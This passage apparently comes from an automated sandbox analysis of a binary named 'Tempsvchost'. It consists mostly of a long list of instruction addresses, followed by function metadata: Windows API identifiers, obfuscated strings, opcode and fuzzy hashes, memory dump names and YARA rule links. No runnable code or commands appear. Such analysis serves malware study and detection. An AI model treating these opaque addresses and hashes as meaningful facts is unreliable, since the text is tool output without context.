                                                                                                                                                                                      0x004b1b1d
                                                                                                                                                                                      0x004b1b23
                                                                                                                                                                                      0x004b1b2f
                                                                                                                                                                                      0x004b1b42
                                                                                                                                                                                      0x004b1b4e
                                                                                                                                                                                      0x004b1b5a
                                                                                                                                                                                      0x004b1b66
                                                                                                                                                                                      0x004b1b79
                                                                                                                                                                                      0x004b1b85
                                                                                                                                                                                      0x004b1b91
                                                                                                                                                                                      0x004b1b9d
                                                                                                                                                                                      0x004b1bb0
                                                                                                                                                                                      0x004b1bbc
                                                                                                                                                                                      0x004b1bc8
                                                                                                                                                                                      0x004b1bd4
                                                                                                                                                                                      0x004b1be6
                                                                                                                                                                                      0x004b1bf2
                                                                                                                                                                                      0x004b1bfe
                                                                                                                                                                                      0x004b1c11
                                                                                                                                                                                      0x004b1c1d
                                                                                                                                                                                      0x004b1c29
                                                                                                                                                                                      0x004b1c35
                                                                                                                                                                                      0x004b1c4b
                                                                                                                                                                                      0x004b1c57
                                                                                                                                                                                      0x004b1c6a
                                                                                                                                                                                      0x004b1c70
                                                                                                                                                                                      0x004b1c80
                                                                                                                                                                                      0x004b1c92
                                                                                                                                                                                      0x004b1ca0
                                                                                                                                                                                      0x004b1ca0
                                                                                                                                                                                      0x004b1cb8
                                                                                                                                                                                      0x004b1cd1
                                                                                                                                                                                      0x004b1ce4
                                                                                                                                                                                      0x004b1cf3
                                                                                                                                                                                      0x004b1d05
                                                                                                                                                                                      0x004b1d11
                                                                                                                                                                                      0x004b1d17
                                                                                                                                                                                      0x004b1d22
                                                                                                                                                                                      0x004b1d22
                                                                                                                                                                                      0x004b1d3a
                                                                                                                                                                                      0x004b1d40
                                                                                                                                                                                      0x004b1d4e
                                                                                                                                                                                      0x004b1d4e
                                                                                                                                                                                      0x004b1d60
                                                                                                                                                                                      0x004b1d66
                                                                                                                                                                                      0x004b1d74
                                                                                                                                                                                      0x004b1d74
                                                                                                                                                                                      0x004b1d8d
                                                                                                                                                                                      0x004b1da0
                                                                                                                                                                                      0x004b1dc1
                                                                                                                                                                                      0x004b1dc7
                                                                                                                                                                                      0x004b1dcd
                                                                                                                                                                                      0x004b1ddb
                                                                                                                                                                                      0x004b1ddb
                                                                                                                                                                                      0x004b1dfc
                                                                                                                                                                                      0x004b1e02
                                                                                                                                                                                      0x004b1e14
                                                                                                                                                                                      0x004b1e22
                                                                                                                                                                                      0x004b1e22
                                                                                                                                                                                      0x004b1e42
                                                                                                                                                                                      0x004b1e54
                                                                                                                                                                                      0x004b1e66
                                                                                                                                                                                      0x004b1e79
                                                                                                                                                                                      0x004b1e7f
                                                                                                                                                                                      0x004b1e92
                                                                                                                                                                                      0x004b1ea5
                                                                                                                                                                                      0x004b1eb8
                                                                                                                                                                                      0x004b1eca
                                                                                                                                                                                      0x004b1edd
                                                                                                                                                                                      0x004b1ef5
                                                                                                                                                                                      0x004b1efb
                                                                                                                                                                                      0x004b1f03
                                                                                                                                                                                      0x004b1f03
                                                                                                                                                                                      0x004b1f23
                                                                                                                                                                                      0x004b1f35
                                                                                                                                                                                      0x004b1f3b
                                                                                                                                                                                      0x004b1f4d
                                                                                                                                                                                      0x004b1f55
                                                                                                                                                                                      0x004b1f55
                                                                                                                                                                                      0x004b1f75
                                                                                                                                                                                      0x004b1f84
                                                                                                                                                                                      0x004b1f93
                                                                                                                                                                                      0x004b1f99
                                                                                                                                                                                      0x004b1fa8
                                                                                                                                                                                      0x004b1fa8
                                                                                                                                                                                      0x004b1fc9
                                                                                                                                                                                      0x004b1fe3
                                                                                                                                                                                      0x004b1fef
                                                                                                                                                                                      0x004b1ff6
                                                                                                                                                                                      0x004b2008
                                                                                                                                                                                      0x004b201a
                                                                                                                                                                                      0x004b202c
                                                                                                                                                                                      0x004b2032
                                                                                                                                                                                      0x004b2038
                                                                                                                                                                                      0x004b2040
                                                                                                                                                                                      0x004b2040
                                                                                                                                                                                      0x004b2058
                                                                                                                                                                                      0x004b206a
                                                                                                                                                                                      0x004b2083
                                                                                                                                                                                      0x004b2089
                                                                                                                                                                                      0x004b209d
                                                                                                                                                                                      0x004b209d
                                                                                                                                                                                      0x004b20bb
                                                                                                                                                                                      0x004b20c7
                                                                                                                                                                                      0x004b20cd
                                                                                                                                                                                      0x004b20db
                                                                                                                                                                                      0x004b20db
                                                                                                                                                                                      0x004b20f4
                                                                                                                                                                                      0x004b2107
                                                                                                                                                                                      0x004b211a
                                                                                                                                                                                      0x004b212d
                                                                                                                                                                                      0x004b213f
                                                                                                                                                                                      0x004b2152
                                                                                                                                                                                      0x004b216a
                                                                                                                                                                                      0x004b2170
                                                                                                                                                                                      0x004b2177
                                                                                                                                                                                      0x004b2177
                                                                                                                                                                                      0x004b218a
                                                                                                                                                                                      0x004b2190
                                                                                                                                                                                      0x004b219c
                                                                                                                                                                                      0x004b219e
                                                                                                                                                                                      0x004b21ac
                                                                                                                                                                                      0x004b21ac
                                                                                                                                                                                      0x004b249f
                                                                                                                                                                                      0x004b2742
                                                                                                                                                                                      0x004b27b3
                                                                                                                                                                                      0x004b27b3
                                                                                                                                                                                      0x004b27b9
                                                                                                                                                                                      0x004b27c2
                                                                                                                                                                                      0x004b27c8
                                                                                                                                                                                      0x004b27e0
                                                                                                                                                                                      0x004b27ec
                                                                                                                                                                                      0x004b27f8
                                                                                                                                                                                      0x004b2804
                                                                                                                                                                                      0x004b2810
                                                                                                                                                                                      0x004b281c
                                                                                                                                                                                      0x004b2828
                                                                                                                                                                                      0x004b2834
                                                                                                                                                                                      0x004b2840
                                                                                                                                                                                      0x004b284c
                                                                                                                                                                                      0x004b2858
                                                                                                                                                                                      0x004b2864
                                                                                                                                                                                      0x004b2870
                                                                                                                                                                                      0x004b287c
                                                                                                                                                                                      0x004b2888
                                                                                                                                                                                      0x004b2894
                                                                                                                                                                                      0x004b28a0
                                                                                                                                                                                      0x004b28ac
                                                                                                                                                                                      0x004b28b8
                                                                                                                                                                                      0x004b28c4
                                                                                                                                                                                      0x004b28d0
                                                                                                                                                                                      0x004b28dc
                                                                                                                                                                                      0x004b28e8
                                                                                                                                                                                      0x004b28f4
                                                                                                                                                                                      0x004b2900
                                                                                                                                                                                      0x004b290c
                                                                                                                                                                                      0x004b2918
                                                                                                                                                                                      0x004b2924
                                                                                                                                                                                      0x004b2930
                                                                                                                                                                                      0x004b293c
                                                                                                                                                                                      0x004b2948
                                                                                                                                                                                      0x004b2954
                                                                                                                                                                                      0x004b2960
                                                                                                                                                                                      0x004b296c
                                                                                                                                                                                      0x004b2978
                                                                                                                                                                                      0x004b2984
                                                                                                                                                                                      0x004b2990
                                                                                                                                                                                      0x004b299c
                                                                                                                                                                                      0x004b29a8
                                                                                                                                                                                      0x004b29b4
                                                                                                                                                                                      0x004b29c0
                                                                                                                                                                                      0x004b29cc
                                                                                                                                                                                      0x004b29d8
                                                                                                                                                                                      0x004b29e4
                                                                                                                                                                                      0x004b29f0
                                                                                                                                                                                      0x004b29fc
                                                                                                                                                                                      0x004b2a08
                                                                                                                                                                                      0x004b2a14
                                                                                                                                                                                      0x004b2a1d
                                                                                                                                                                                      0x004b2a29
                                                                                                                                                                                      0x004b2a35
                                                                                                                                                                                      0x004b2a41
                                                                                                                                                                                      0x004b2a4d
                                                                                                                                                                                      0x004b2a59
                                                                                                                                                                                      0x004b2a65
                                                                                                                                                                                      0x004b2a71
                                                                                                                                                                                      0x004b2a7d
                                                                                                                                                                                      0x004b2a89
                                                                                                                                                                                      0x004b2a95
                                                                                                                                                                                      0x004b2aa1
                                                                                                                                                                                      0x004b2aad
                                                                                                                                                                                      0x004b2ab9
                                                                                                                                                                                      0x004b2ac5
                                                                                                                                                                                      0x004b2ad1
                                                                                                                                                                                      0x004b2add
                                                                                                                                                                                      0x004b2ae9
                                                                                                                                                                                      0x004b2af5
                                                                                                                                                                                      0x004b2b01
                                                                                                                                                                                      0x004b2b0d
                                                                                                                                                                                      0x004b2b19
                                                                                                                                                                                      0x004b2b25
                                                                                                                                                                                      0x004b2b2e
                                                                                                                                                                                      0x004b2b3a
                                                                                                                                                                                      0x004b2b46
                                                                                                                                                                                      0x004b2b52
                                                                                                                                                                                      0x004b2b5e
                                                                                                                                                                                      0x004b2b6a
                                                                                                                                                                                      0x004b2b76
                                                                                                                                                                                      0x004b2b82
                                                                                                                                                                                      0x004b2b8e
                                                                                                                                                                                      0x004b2b9a
                                                                                                                                                                                      0x004b2ba6
                                                                                                                                                                                      0x004b2bb2
                                                                                                                                                                                      0x004b2bbe
                                                                                                                                                                                      0x004b2bca
                                                                                                                                                                                      0x004b2bd6
                                                                                                                                                                                      0x004b2be2
                                                                                                                                                                                      0x004b2bee
                                                                                                                                                                                      0x004b2bfa
                                                                                                                                                                                      0x004b2c06
                                                                                                                                                                                      0x004b2c12
                                                                                                                                                                                      0x004b2c1e
                                                                                                                                                                                      0x004b2c2a
                                                                                                                                                                                      0x004b2c36
                                                                                                                                                                                      0x004b2c42
                                                                                                                                                                                      0x004b2c4e
                                                                                                                                                                                      0x004b2c5a
                                                                                                                                                                                      0x004b2c66
                                                                                                                                                                                      0x004b2c72
                                                                                                                                                                                      0x004b2c7e
                                                                                                                                                                                      0x004b2c8a
                                                                                                                                                                                      0x004b2c96
                                                                                                                                                                                      0x004b2ca2
                                                                                                                                                                                      0x004b2cae
                                                                                                                                                                                      0x004b2cba
                                                                                                                                                                                      0x004b2cc6
                                                                                                                                                                                      0x004b2cd2
                                                                                                                                                                                      0x004b2cde
                                                                                                                                                                                      0x004b2cea
                                                                                                                                                                                      0x004b2cf6
                                                                                                                                                                                      0x004b2d02
                                                                                                                                                                                      0x004b2d0e
                                                                                                                                                                                      0x004b2d1a
                                                                                                                                                                                      0x004b2d26
                                                                                                                                                                                      0x004b2d32
                                                                                                                                                                                      0x004b2d3e
                                                                                                                                                                                      0x004b2d4a
                                                                                                                                                                                      0x004b2d56
                                                                                                                                                                                      0x004b2d62
                                                                                                                                                                                      0x004b2d6e
                                                                                                                                                                                      0x004b2d7a
                                                                                                                                                                                      0x004b2d86
                                                                                                                                                                                      0x004b2d92
                                                                                                                                                                                      0x004b2d9e
                                                                                                                                                                                      0x004b2daa
                                                                                                                                                                                      0x004b2db6
                                                                                                                                                                                      0x004b2dc2
                                                                                                                                                                                      0x004b2dce
                                                                                                                                                                                      0x004b2dda
                                                                                                                                                                                      0x004b2de6
                                                                                                                                                                                      0x004b2df2
                                                                                                                                                                                      0x004b2dfe
                                                                                                                                                                                      0x004b2e0a
                                                                                                                                                                                      0x004b2e1d
                                                                                                                                                                                      0x004b2e30
                                                                                                                                                                                      0x004b2e3c
                                                                                                                                                                                      0x004b2e48
                                                                                                                                                                                      0x004b2e5b
                                                                                                                                                                                      0x004b2e67
                                                                                                                                                                                      0x004b2e7a
                                                                                                                                                                                      0x004b2e8d
                                                                                                                                                                                      0x004b2e9f
                                                                                                                                                                                      0x004b2eab
                                                                                                                                                                                      0x004b2ec4
                                                                                                                                                                                      0x004b2ed7
                                                                                                                                                                                      0x004b2eea
                                                                                                                                                                                      0x004b2ef9
                                                                                                                                                                                      0x004b2eff
                                                                                                                                                                                      0x004b2f12
                                                                                                                                                                                      0x004b2f1e
                                                                                                                                                                                      0x004b2f24
                                                                                                                                                                                      0x004b2f2b
                                                                                                                                                                                      0x004b2f3e
                                                                                                                                                                                      0x004b2f54
                                                                                                                                                                                      0x004b2f66
                                                                                                                                                                                      0x004b2f75
                                                                                                                                                                                      0x004b2f81
                                                                                                                                                                                      0x004b2f8d
                                                                                                                                                                                      0x004b2fa0
                                                                                                                                                                                      0x004b2fb3
                                                                                                                                                                                      0x004b2fc6
                                                                                                                                                                                      0x004b2fd4
                                                                                                                                                                                      0x004b2fe7
                                                                                                                                                                                      0x004b2ffa
                                                                                                                                                                                      0x004b3010
                                                                                                                                                                                      0x004b3016
                                                                                                                                                                                      0x004b3024
                                                                                                                                                                                      0x004b3024
                                                                                                                                                                                      0x004b303d
                                                                                                                                                                                      0x004b3043
                                                                                                                                                                                      0x004b3055
                                                                                                                                                                                      0x004b3067
                                                                                                                                                                                      0x004b3079
                                                                                                                                                                                      0x004b3087
                                                                                                                                                                                      0x004b3087
                                                                                                                                                                                      0x004b3093
                                                                                                                                                                                      0x004b309c
                                                                                                                                                                                      0x004b30aa
                                                                                                                                                                                      0x004b30aa
                                                                                                                                                                                      0x004b30c2
                                                                                                                                                                                      0x004b30c9
                                                                                                                                                                                      0x004b30de
                                                                                                                                                                                      0x004b30e4
                                                                                                                                                                                      0x004b30f3
                                                                                                                                                                                      0x004b30f3
                                                                                                                                                                                      0x004b310d
                                                                                                                                                                                      0x004b3113
                                                                                                                                                                                      0x004b3126
                                                                                                                                                                                      0x004b3139
                                                                                                                                                                                      0x004b314c
                                                                                                                                                                                      0x004b315e
                                                                                                                                                                                      0x004b3170
                                                                                                                                                                                      0x004b317f
                                                                                                                                                                                      0x004b317f
                                                                                                                                                                                      0x004b3192
                                                                                                                                                                                      0x004b31a5
                                                                                                                                                                                      0x004b31b7
                                                                                                                                                                                      0x004b31c9
                                                                                                                                                                                      0x004b31d8
                                                                                                                                                                                      0x004b31d8
                                                                                                                                                                                      0x004b31ea
                                                                                                                                                                                      0x004b31fc
                                                                                                                                                                                      0x004b3204
                                                                                                                                                                                      0x004b3204
                                                                                                                                                                                      0x004b3217
                                                                                                                                                                                      0x004b3225
                                                                                                                                                                                      0x004b3237
                                                                                                                                                                                      0x004b323f
                                                                                                                                                                                      0x004b323f
                                                                                                                                                                                      0x004b3257
                                                                                                                                                                                      0x004b325d
                                                                                                                                                                                      0x004b326b
                                                                                                                                                                                      0x004b326b
                                                                                                                                                                                      0x004b3283
                                                                                                                                                                                      0x004b3289
                                                                                                                                                                                      0x004b3297
                                                                                                                                                                                      0x004b3297
                                                                                                                                                                                      0x004b35a3
                                                                                                                                                                                      0x004b37bd
                                                                                                                                                                                      0x004b3886
                                                                                                                                                                                      0x004b3886
                                                                                                                                                                                      0x004b3892
                                                                                                                                                                                      0x004b389e
                                                                                                                                                                                      0x004b38f5
                                                                                                                                                                                      0x004b38f8
                                                                                                                                                                                      0x004b38fa
                                                                                                                                                                                      0x004b3902
                                                                                                                                                                                      0x004b390a
                                                                                                                                                                                      0x004b3912
                                                                                                                                                                                      0x004b3919
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004b3919
                                                                                                                                                                                      0x004b38a0
                                                                                                                                                                                      0x004b38a0
                                                                                                                                                                                      0x004b38a8
                                                                                                                                                                                      0x004b38b0
                                                                                                                                                                                      0x004b38b8
                                                                                                                                                                                      0x004b38bf
                                                                                                                                                                                      0x004b38c4
                                                                                                                                                                                      0x004b38cd
                                                                                                                                                                                      0x004b38cf
                                                                                                                                                                                      0x004b38d7
                                                                                                                                                                                      0x004b38df
                                                                                                                                                                                      0x004b38e7
                                                                                                                                                                                      0x004b38ee
                                                                                                                                                                                      0x004b391e
                                                                                                                                                                                      0x004b391e
                                                                                                                                                                                      0x004b391e
                                                                                                                                                                                      0x004b38cd
                                                                                                                                                                                      0x004b3924
                                                                                                                                                                                      0x004b392c
                                                                                                                                                                                      0x004b393a
                                                                                                                                                                                      0x004b393d
                                                                                                                                                                                      0x004b393d
                                                                                                                                                                                      0x004b3947
                                                                                                                                                                                      0x004b394b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004b3951
                                                                                                                                                                                      0x004b3957
                                                                                                                                                                                      0x004b3961
                                                                                                                                                                                      0x004b3967
                                                                                                                                                                                      0x004b3977
                                                                                                                                                                                      0x004b3986
                                                                                                                                                                                      0x004b3989
                                                                                                                                                                                      0x004b3989
                                                                                                                                                                                      0x004b398f
                                                                                                                                                                                      0x004b3994
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004b39b3
                                                                                                                                                                                      0x004b39b9
                                                                                                                                                                                      0x004b39c3
                                                                                                                                                                                      0x004b39c9
                                                                                                                                                                                      0x004b39cb
                                                                                                                                                                                      0x004b39cb
                                                                                                                                                                                      0x004b39d1
                                                                                                                                                                                      0x004b39d1
                                                                                                                                                                                      0x004b39dd
                                                                                                                                                                                      0x004b39dd
                                                                                                                                                                                      0x004b3996
                                                                                                                                                                                      0x004b3999
                                                                                                                                                                                      0x004b39a6
                                                                                                                                                                                      0x004b39a6
                                                                                                                                                                                      0x004b39a9
                                                                                                                                                                                      0x004b39ab
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004b39ab
                                                                                                                                                                                      0x004b39fa
                                                                                                                                                                                      0x004b3a05
                                                                                                                                                                                      0x004b3a13
                                                                                                                                                                                      0x004b3a13
                                                                                                                                                                                      0x004b3a1d
                                                                                                                                                                                      0x004b3a1f
                                                                                                                                                                                      0x004b3a21
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004b3a23
                                                                                                                                                                                      0x004b3a26
                                                                                                                                                                                      0x004b3a30
                                                                                                                                                                                      0x004b3a36
                                                                                                                                                                                      0x004b3a36
                                                                                                                                                                                      0x004b3a39
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004b3a41
                                                                                                                                                                                      0x004b3a4f
                                                                                                                                                                                      0x004b3a4f
                                                                                                                                                                                      0x004b3a51
                                                                                                                                                                                      0x004b3a54
                                                                                                                                                                                      0x004b3a54
                                                                                                                                                                                      0x004b3a5a
                                                                                                                                                                                      0x004b3a5d
                                                                                                                                                                                      0x004b3a5f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004b3a7b
                                                                                                                                                                                      0x004b3a81
                                                                                                                                                                                      0x004b3a88
                                                                                                                                                                                      0x004b3a8b
                                                                                                                                                                                      0x004b3a8d
                                                                                                                                                                                      0x004b3a8d
                                                                                                                                                                                      0x004b3a90
                                                                                                                                                                                      0x004b3a90
                                                                                                                                                                                      0x004b3a9c
                                                                                                                                                                                      0x004b3a9c
                                                                                                                                                                                      0x004b3a61
                                                                                                                                                                                      0x004b3a68
                                                                                                                                                                                      0x004b3a6f
                                                                                                                                                                                      0x004b3a72
                                                                                                                                                                                      0x004b3a74
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004b3a74
                                                                                                                                                                                      0x004b3aa3
                                                                                                                                                                                      0x004b3ab4
                                                                                                                                                                                      0x004b3ab7
                                                                                                                                                                                      0x004b3aba
                                                                                                                                                                                      0x004b3ac3
                                                                                                                                                                                      0x004b3ac5
                                                                                                                                                                                      0x004b3ac6
                                                                                                                                                                                      0x004b3ace
                                                                                                                                                                                      0x004b3ad6
                                                                                                                                                                                      0x004b3ade
                                                                                                                                                                                      0x004b3ae5
                                                                                                                                                                                      0x004b3af2
                                                                                                                                                                                      0x004b3af6
                                                                                                                                                                                      0x004b3af8
                                                                                                                                                                                      0x004b3afc
                                                                                                                                                                                      0x004b3b00
                                                                                                                                                                                      0x004b3b00
                                                                                                                                                                                      0x004b3b02
                                                                                                                                                                                      0x004b3b06
                                                                                                                                                                                      0x004b3b0a
                                                                                                                                                                                      0x004b3b0e
                                                                                                                                                                                      0x004b3b12
                                                                                                                                                                                      0x004b3b16
                                                                                                                                                                                      0x004b3b1a
                                                                                                                                                                                      0x004b3b1e
                                                                                                                                                                                      0x004b3b22
                                                                                                                                                                                      0x004b3b26
                                                                                                                                                                                      0x004b3b2a
                                                                                                                                                                                      0x004b3b2e
                                                                                                                                                                                      0x004b3b32
                                                                                                                                                                                      0x004b3b36
                                                                                                                                                                                      0x004b3b3a
                                                                                                                                                                                      0x004b3b3e
                                                                                                                                                                                      0x004b3b42
                                                                                                                                                                                      0x004b3b46
                                                                                                                                                                                      0x004b3b4a
                                                                                                                                                                                      0x004b3b4e
                                                                                                                                                                                      0x004b3b52
                                                                                                                                                                                      0x004b3b56
                                                                                                                                                                                      0x004b3b5a
                                                                                                                                                                                      0x004b3b5e
                                                                                                                                                                                      0x004b3b62
                                                                                                                                                                                      0x004b3b66
                                                                                                                                                                                      0x004b3b6a
                                                                                                                                                                                      0x004b3b6e
                                                                                                                                                                                      0x004b3b72
                                                                                                                                                                                      0x004b3b76
                                                                                                                                                                                      0x004b3b7a
                                                                                                                                                                                      0x004b3b7a
                                                                                                                                                                                      0x004b3b7e
                                                                                                                                                                                      0x004b3b7f
                                                                                                                                                                                      0x004b3b7f
                                                                                                                                                                                      0x004b3b84
                                                                                                                                                                                      0x004b3b87
                                                                                                                                                                                      0x004b3b8a
                                                                                                                                                                                      0x004b3b8e
                                                                                                                                                                                      0x004b3b92
                                                                                                                                                                                      0x004b3b9c
                                                                                                                                                                                      0x004b3b9e
                                                                                                                                                                                      0x004b3b9f
                                                                                                                                                                                      0x004b3ba3
                                                                                                                                                                                      0x004b3ba5
                                                                                                                                                                                      0x004b3ba9
                                                                                                                                                                                      0x004b3bad
                                                                                                                                                                                      0x004b3bb1
                                                                                                                                                                                      0x004b3bb5
                                                                                                                                                                                      0x004b3bb9
                                                                                                                                                                                      0x004b3bbd
                                                                                                                                                                                      0x004b3bc1
                                                                                                                                                                                      0x004b3bc5
                                                                                                                                                                                      0x004b3bc9
                                                                                                                                                                                      0x004b3bcd
                                                                                                                                                                                      0x004b3bd1
                                                                                                                                                                                      0x004b3bd5
                                                                                                                                                                                      0x004b3bd9
                                                                                                                                                                                      0x004b3bdd
                                                                                                                                                                                      0x004b3be1
                                                                                                                                                                                      0x004b3be5
                                                                                                                                                                                      0x004b3be9
                                                                                                                                                                                      0x004b3bed
                                                                                                                                                                                      0x004b3bf1
                                                                                                                                                                                      0x004b3bf5
                                                                                                                                                                                      0x004b3bf9
                                                                                                                                                                                      0x004b3bfd
                                                                                                                                                                                      0x004b3c01
                                                                                                                                                                                      0x004b3c05
                                                                                                                                                                                      0x004b3c09
                                                                                                                                                                                      0x004b3c0d
                                                                                                                                                                                      0x004b3c0d
                                                                                                                                                                                      0x004b3c11
                                                                                                                                                                                      0x004b3c12
                                                                                                                                                                                      0x004b3c12
                                                                                                                                                                                      0x004b3c17
                                                                                                                                                                                      0x004b3c1c
                                                                                                                                                                                      0x004b3c26
                                                                                                                                                                                      0x004b3c28
                                                                                                                                                                                      0x004b3c30
                                                                                                                                                                                      0x004b3c38
                                                                                                                                                                                      0x004b3c3f
                                                                                                                                                                                      0x004b3c47
                                                                                                                                                                                      0x004b3c4f
                                                                                                                                                                                      0x004b3c57
                                                                                                                                                                                      0x004b3c5f
                                                                                                                                                                                      0x004b3c67
                                                                                                                                                                                      0x004b3c6f
                                                                                                                                                                                      0x004b3c77
                                                                                                                                                                                      0x004b3c7f
                                                                                                                                                                                      0x004b3c87
                                                                                                                                                                                      0x004b3c8f
                                                                                                                                                                                      0x004b3c97
                                                                                                                                                                                      0x004b3c9f
                                                                                                                                                                                      0x004b3ca7
                                                                                                                                                                                      0x004b3caf
                                                                                                                                                                                      0x004b3cb7
                                                                                                                                                                                      0x004b3cbb
                                                                                                                                                                                      0x004b3cc3
                                                                                                                                                                                      0x004b3ccb
                                                                                                                                                                                      0x004b3cd3
                                                                                                                                                                                      0x004b3cdb
                                                                                                                                                                                      0x004b3ce3
                                                                                                                                                                                      0x004b3ceb
                                                                                                                                                                                      0x004b3cf3
                                                                                                                                                                                      0x004b3cfb
                                                                                                                                                                                      0x004b3d03
                                                                                                                                                                                      0x004b3d0b
                                                                                                                                                                                      0x004b3d13
                                                                                                                                                                                      0x004b3d17
                                                                                                                                                                                      0x004b3d1a
                                                                                                                                                                                      0x004b3d22
                                                                                                                                                                                      0x004b3d27
                                                                                                                                                                                      0x004b3d2f
                                                                                                                                                                                      0x004b3d37
                                                                                                                                                                                      0x004b3d3f
                                                                                                                                                                                      0x004b3d46
                                                                                                                                                                                      0x004b3d49
                                                                                                                                                                                      0x004b3d51
                                                                                                                                                                                      0x004b3d59
                                                                                                                                                                                      0x004b3d61
                                                                                                                                                                                      0x004b3d69
                                                                                                                                                                                      0x004b3d71
                                                                                                                                                                                      0x004b3d79
                                                                                                                                                                                      0x004b3d7d
                                                                                                                                                                                      0x004b3d84
                                                                                                                                                                                      0x004b3d8c
                                                                                                                                                                                      0x004b3d96
                                                                                                                                                                                      0x004b3d96
                                                                                                                                                                                      0x004b3a11
                                                                                                                                                                                      0x004b3a11
                                                                                                                                                                                      0x004b3a11
                                                                                                                                                                                      0x004b3a13
                                                                                                                                                                                      0x004b3a0a
                                                                                                                                                                                      0x004b3a0a
                                                                                                                                                                                      0x004b3a0a

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000011.00000002.418343076.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000011.00000002.418330554.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418580864.00000000004BA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418795686.0000000000582000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418808067.0000000000584000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418818167.0000000000585000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418868780.00000000005CA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Tempsvchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocVirtual$ConsoleFreeMessageSleep
                                                                                                                                                                                      • String ID: "$$$'$,$.$/$3$404864006631164583884887946307737350261444662$5$6$>$?$?$Bw$D$FrApGUvUXHLjDSRdOAJgcKQpXUEYNXJxPkUpIzMgMJbRRjrhxoccPukGaMTRzmIbvvAuWKvTmRWZQAyXdvAjjvMspG$J$M$M$M$P$P$R$S$S$W$Z$Z$^$adibcpvetkhjyjubiqtpbsxciteiju$c$sgleseqflronoudksyjwcamaeaygtwnbpcrfmtfuuerudajwlsbwxkejqlnfijmhdhbigovyxcsigqrunkpgfyovdkmrihrleqmgdbvjwfricweyltemdxautwyxemcrfk
                                                                                                                                                                                      • API String ID: 1514456886-3615064325
                                                                                                                                                                                      • Opcode ID: 4bd08522a33d93b7cbcad1fa9fba25a4f16177e31bfca542e029770241f52f59
                                                                                                                                                                                      • Instruction ID: 020f7f1347fbcadbed84958abf0c3e4152e527484b6102bf15c600c86f48e0af
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bd08522a33d93b7cbcad1fa9fba25a4f16177e31bfca542e029770241f52f59
                                                                                                                                                                                      • Instruction Fuzzy Hash: DE8379768012298FCB25CF18CD85BC9B7B5BF44308F1985EAC54DAB212D771AB99CF84
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004011B0 Relevance: 12.1, APIs: 8, Instructions: 59COMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000011.00000002.418343076.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000011.00000002.418330554.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418580864.00000000004BA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418795686.0000000000582000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418808067.0000000000584000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418818167.0000000000585000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418868780.00000000005CA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Tempsvchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _setmode$ExceptionExitFilterProcessUnhandled__p__environ__p__fmode_cexit
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3476844589-0
                                                                                                                                                                                      • Opcode ID: dd8adadf1a84614afd1318a95a5fd34f2d7b6c90b6412efc20d49cff63297d20
                                                                                                                                                                                      • Instruction ID: 7c7da39cd961e60a4f8c1cb4be5d4f65eda661a790bcb7970af67935fc6a2f76
                                                                                                                                                                                      • Opcode Fuzzy Hash: dd8adadf1a84614afd1318a95a5fd34f2d7b6c90b6412efc20d49cff63297d20
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2221DAB4604B00DFC700FF79D485A5A7BF4BF58718F41482EE8849B356DB389889DB56
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00401340 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 58libraryloaderCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
